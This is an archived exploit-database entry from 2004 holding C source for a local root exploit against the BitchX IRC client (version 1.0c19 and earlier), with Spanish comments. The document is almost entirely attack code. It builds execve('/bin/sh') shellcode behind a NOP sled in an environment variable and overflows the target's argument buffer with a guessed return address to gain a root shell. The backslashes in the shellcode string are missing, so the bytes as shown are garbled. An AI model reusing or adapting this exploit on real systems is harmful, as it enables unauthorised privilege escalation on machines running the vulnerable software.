https://www.exploit-db.com/exploits/586

漏洞细节尚未披露

// BitchX local-root by Sha0 (version 1.0c19 e inferiores -todas-)
// este exploit se lo dedico a mi chica.
// 0xC0000000-4-strlen(argv[1])-1-strlen(buffer)
// 2052 to the ret

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

char payload[69];
char sha0code[] =
 "xebx16x5bx31xc0"
 "x50x53xb0x0bx89"
 "xdbx89xe1x31xd2"
 "xcdx80x31xc0x40"
 "x31xdbxcdx80xe8"
 "xe5xffxffxffx2f"
 "x62x69x6ex2fx73x68";


void nopea (void);

int main (int argc, char **argv) {
 
 char *buff;
 char *arg1="bash";
 char *arg2="-c";
 char *arg[]={arg1,arg2,buff,NULL};
 char *env[]={"TERM=xterm",payload,NULL};
 char offset[]="";
 char sret[4];
 unsigned long lret;
 int i;

 if (argc != 2) {
  fprintf (stdout,"BitchX exploit Coded By Sha0n");
  fprintf (stdout,"ej: %s /usr/bin/BitchXnn",argv[0]);
  return (1);
 }

 buff = (char *)malloc (2100);
 bzero (buff,sizeof(buff));
 arg[2] = buff;
 
 nopea ();

 lret = 0xbffffffa - strlen(payload) - strlen(argv[1]);
 sret[0] = (0x000000ff & lret);
 sret[1] = (0x0000ff00 & lret) >> 8;
 sret[2] = (0x00ff0000 & lret) >> 16;
 sret[3] = (0xff000000 & lret) >> 24;

 for (i=0;i<2088;i+=4) // 2088 tirando largo.
  memcpy (buff+i,sret,4);

 execve (argv[1],arg,env);
 perror ("execve()");

 free (buff);
 return (0);
}


void nopea (void) {
        bzero (payload,sizeof(payload));
        memset (payload,0x90,sizeof(payload)-1);
        memcpy (payload+sizeof(payload)-strlen(sha0code)-1,sha0code,strlen(sha0code));
}

// milw0rm.com [2004-10-20]